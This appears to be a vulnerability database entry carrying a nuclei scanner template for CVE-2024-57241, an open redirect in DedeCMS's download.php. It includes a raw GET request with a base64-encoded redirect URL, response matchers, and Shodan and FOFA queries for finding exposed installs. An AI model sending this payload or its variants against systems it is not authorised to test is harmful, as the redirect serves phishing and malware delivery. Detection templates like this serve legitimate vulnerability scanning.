Lucene search
+L

DedeCMS - Open Redirect via download.php

🗓️ 18 Aug 2026 02:59:29Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

DedeCMS open redirect via download.php in older versions due to improper GET input validation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2024-57241
11 Feb 202521:52
circl
cnnvd
CNNVD
DesDev DedeCMS 安全漏洞
11 Feb 202500:00
cnnvd
cve
CVE
CVE-2024-57241
11 Feb 202500:00
cve
cvelist
Cvelist
CVE-2024-57241
11 Feb 202500:00
cvelist
euvd
EUVD
EUVD-2024-53554
3 Oct 202520:07
euvd
nvd
NVD
CVE-2024-57241
11 Feb 202522:15
nvd
osv
OSV
CVE-2024-57241
11 Feb 202522:15
osv
ptsecurity
Positive Technologies
PT-2025-6400
11 Feb 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2024-57241
13 Feb 202500:24
redhatcve
vulnrichment
Vulnrichment
CVE-2024-57241
11 Feb 202500:00
vulnrichment
id: CVE-2024-57241

info:
  name: DedeCMS - Open Redirect via download.php
  author: 0x_Akoko
  severity: medium
  description: |
    Dedecms 5.71sp1 and earlier contain a URL redirect caused by a logic error that does not properly validate GET request input, letting attackers redirect users to arbitrary URLs, exploit requires sending crafted GET requests.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to the latest version of Dedecms or apply security patches addressing URL redirect issues.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57241
    - https://github.com/woshidaheike/dedecms-url-redirection
  classification:
    cve-id: CVE-2024-57241
    epss-score: 0.01144
    epss-percentile: 0.64012
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    vendor: dedecms
    product: dedecms
    shodan-query: 'http.title:"DedeCMS"'
    fofa-query: 'body="DedeCMS" || body="/plus/download.php"'
  tags: cve,cve2024,dedecms,redirect,cms

http:
  - raw:
      - |
        GET /plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'location == "https://interact.sh"'
        condition: and
# digest: 490a00463044022005d296fb40c7440b2918b3d7e104e840e0157fcf715c79a25d688f6a9c4ab17902202381b96e65fe1ff432b72d2585ed05c7035efe0d4460202f9f2863e64793eda6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2026 23:33Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.16.5
EPSS0.01144
SSVC
21